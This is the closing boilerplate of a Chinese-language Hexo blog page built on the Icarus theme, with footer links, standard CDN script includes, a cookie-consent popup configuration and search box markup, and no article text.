class="level-end"><div class="field has-addons"><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Creative Commons" href="https://creativecommons.org/"><i class="fab fa-creative-commons"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Attribution 4.0 International" href="https://creativecommons.org/licenses/by/4.0/"><i class="fab fa-creative-commons-by"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Download on GitHub" href="https://github.com/ppoffice/hexo-theme-icarus"><i class="fab fa-github"></i></a></p></div></div></div></div></footer><script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/moment@2.22.2/min/moment-with-locales.min.js"></script><script src="https://cdn.jsdelivr.net/npm/clipboard@2.0.4/dist/clipboard.min.js" async></script><script>moment.locale("zh-CN");</script><script>var IcarusThemeSettings = {
            article: {
                highlight: {
                    clipboard: true,
                    fold: 'unfolded'
                }
            }
        };</script><script src="/js/column.js"></script><script src="/js/animation.js"></script><a id="back-to-top" title="回到顶端" href="javascript:;"><i class="fas fa-chevron-up"></i></a><script src="/js/back_to_top.js" defer></script><!--!--><!--!--><!--!--><script src="https://cdn.jsdelivr.net/npm/cookieconsent@3.1.1/build/cookieconsent.min.js" defer></script><script>window.addEventListener("load", () => {
      window.cookieconsent.initialise({
        type: "info",
        theme: "edgeless",
        static: false,
        position: "bottom-left",
        content: {
          message: "此网站使用Cookie来改善您的体验。",
          dismiss: "知道了！",
          allow: "允许使用Cookie",
          deny: "拒绝",
          link: "了解更多",
          policy: "Cookie政策",
          href: "https://www.cookiesandyou.com/",
        },
        palette: {
          popup: {
            background: "#edeff5",
            text: "#838391"
          },
          button: {
            background: "#4b81e8"
          },
        },
      });
    });</script><script src="https://cdn.jsdelivr.net/npm/lightgallery@1.6.8/dist/js/lightgallery.min.js" defer></script><script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/js/jquery.justifiedGallery.min.js" defer></script><script>window.addEventListener("load", () => {
            if (typeof $.fn.lightGallery === 'function') {
                $('.article').lightGallery({ selector: '.gallery-item' });
            }
            if (typeof $.fn.justifiedGallery === 'function') {
                if ($('.justified-gallery > p > .gallery-item').length) {
                    $('.justified-gallery > p > .gallery-item').unwrap();
                }
                $('.justified-gallery').justifiedGallery();
            }
        });</script><!--!--><!--!--><!--!--><!--!--><!--!--><script src="/js/main.js" defer></script><div class="searchbox"><div class="searchbox-container"><div class="searchbox-header"><div class="searchbox-input-container"><input class="searchbox-input" type="text" placeholder="想要查找什么..."></div><a class="searchbox-close" href="javascript:;">×</a></div><div class="searchbox-body"></div></div></div><script src="/js/insight.js" defer></script><script>document.addEventListener('DOMContentLoaded', function () {
            loadInsight({"contentUrl":"/content.json"}, {"hint":"想要查找什么...","untitled":"(无标题)","posts":"文章","pages":"页面","categories":"分类","tags":"标签"});
        });</script></body></html>